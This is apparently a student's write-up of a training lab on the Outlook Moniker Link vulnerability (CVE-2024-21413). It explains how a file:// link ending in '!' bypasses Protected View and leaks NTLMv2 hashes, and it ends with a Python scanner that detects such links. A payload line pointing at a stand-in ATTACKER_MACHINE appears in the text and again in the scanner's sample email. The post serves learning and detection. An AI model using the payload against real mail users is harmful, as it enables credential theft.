Moniker Link
I’ve recently begun exploring Exploitation Basics within the Cyber Security 101 path. Moniker Link was the first exploit discussed. It bypasses Outlook’s security mechanism when given a certain type of hyperlink, the Moniker Link. I can abuse this by sending the victim an email containing the malicious link; doing so successfully causes Outlook to send the victim’s NTLM credentials once the hyperlink is clicked.
So how does this vulnerability work? Well, most of the time the mail software will show a security warning when one attempts to open an external application. Personally, I’ve come across this prompt one too many times, and I always found it tedious and unnecessary, but there’s a crucial reason for it. On February 13th 2024, Microsoft announced a Microsoft Outlook RCE and credential leak vulnerability, assigned CVE-2024-21413 (Moniker Link). What is RCE? RCE stands for “Remote Code Execution”: a vulnerability that allows an attacker to run arbitrary code on a remote system.
When successful, this can lead to a complete compromise of the target system. Russian hackers, known as “the bears”, famously used an exploit similar to this one by sending a hyperlink to a staff member of the German government. This successful exploit allowed the hackers to gain full access to the German parliament’s private emails and documents. As this caught my attention in a very exuberant way (in terms of how they were able to exploit the system), I know the consequences of such actions are severe, and I do value my freedom! So I’ll quickly mention how I’ll continue to be a law-abiding citizen XD!!
As previously stated, Outlook shows a pop-up as a result of Outlook’s “Protected View”, which opens any email carrying an attachment or link in read-only mode and blocks content coming from entities outside the organisation. These controls are in place to stop malicious entities from accessing our information, BUT!… By using the “file://” moniker within our hyperlink, we can make Outlook attempt to access a file, such as a file on a network share. The “Server Message Block” protocol (SMB, the network file-sharing protocol used to reach files, folders and devices on other computers on the same network) is used for that access, and authenticating to the share involves the user’s local credentials. On its own this attempt is easily blocked, because Outlook’s Protected View catches it.
The vulnerability occurs with a simple addition to one’s hyperlink: appending the “!” special character and some text to the moniker link bypasses Outlook’s Protected View. The attacker can provide a Moniker Link such as this one: `<p><a href="file://ATTACKER_MACHINE/test!exploit">Click me</a></p>`. Here “file://” tells Outlook to access a file, “ATTACKER_MACHINE” is your server, and “!exploit” is the bypass trick for the attack. Keep in mind the share does not have to exist on the remote device; authentication will be attempted regardless, so the victim’s NTLMv2 hash, which is used to verify a user’s identity over a network without sending their password in plain text, is sent to us.
I completed a simple exploitation task within an AttackBox. The objective was to create a Moniker Link that bypasses the victim’s Protected View security mechanism, so that the victim tries to load a file from my attacking machine, resulting in me acquiring their NTLMv2 hash :). Using the proof of concept provided to me and Responder, which initiated an SMB listener on my attacking machine, the victim’s netNTLMv2 hash was captured on my AttackBox!
As for detecting exploits like this one, Florian Roth published a YARA rule that detects emails containing the “file://” element in Moniker Links. The packet analyser Wireshark helps too: the SMB request from the victim to the attacker’s machine can be seen within a packet capture, along with a truncated netNTLMv2 hash.
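As an added example (not code from the original post, the room, or Florian Roth’s rule), here is a small Python scanner that applies the same detection idea to a mail message: it walks the MIME parts, pulls every `href` out of each HTML body, keeps the ones using the `file://` moniker, and flags those whose path carries the “!” bypass marker described above. The sample message and the hostnames in it are constructed placeholders, and a finding without the “!” marker is still reported, because a `file://` link to an outside host in email is worth a look either way.

```python
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlsplit


class _HrefCollector(HTMLParser):
    """Collects the href attribute of every <a> tag in an HTML body."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "a":
            return
        for name, value in attrs:
            if name.lower() == "href" and value:
                self.hrefs.append(value.strip())


def extract_hrefs(html_body):
    """Return all href values found in an HTML string, in document order."""
    collector = _HrefCollector()
    collector.feed(html_body)
    return collector.hrefs


def inspect_link(href):
    """Return a finding dict for a file:// moniker link, or None for any other link."""
    scheme, _, remainder = href.partition(":")
    if scheme.strip().lower() != "file":
        return None
    parts = urlsplit(href)
    return {
        "href": href,
        # The host the client would authenticate to when resolving the link.
        "host": parts.netloc.lower(),
        # A '!' after the scheme is the Protected View bypass marker (file://HOST/share!text).
        "moniker_bypass": "!" in remainder,
    }


def scan_email_html(html_body):
    """Scan one HTML body and return findings for every file:// link in it."""
    findings = []
    for href in extract_hrefs(html_body):
        finding = inspect_link(href)
        if finding is not None:
            findings.append(finding)
    return findings


def scan_raw_message(raw_bytes):
    """Parse a raw RFC 5322 message and scan every text/html part it contains."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            findings.extend(scan_email_html(part.get_content()))
    return findings


# Constructed sample message: one benign https link, one plain file:// link to an
# internal host, and one file:// link carrying the '!' bypass marker.
SAMPLE_RAW_EMAIL = b"""From: sender@example.invalid
To: analyst@example.invalid
Subject: constructed sample for moniker link scanning
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body>
<p><a href="https://www.example.com/report">Quarterly report</a></p>
<p><a href="file://FILESERVER01/share/notes.txt">Shared notes</a></p>
<p><a href="file://ATTACKER_MACHINE/test!exploit">Click me</a></p>
</body></html>
"""


if __name__ == "__main__":
    for finding in scan_raw_message(SAMPLE_RAW_EMAIL):
        severity = "HIGH (bypass marker)" if finding["moniker_bypass"] else "review"
        print(f"{severity}: host={finding['host']} href={finding['href']}")
```

Run against the constructed message, the scanner reports the internal `file://` link for review and the `!exploit` link as high severity; the `https://` link is ignored. Feeding it a mailbox export is a matter of calling `scan_raw_message` on each message’s bytes.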
Microsoft has released patches to remove such vulnerabilities from their software, but it’s still highly recommended to follow cyber-security precautions, such as not clicking random links, reviewing links before clicking them, and reporting suspicious links to the department responsible for cyber security (MEEEEEE!!!).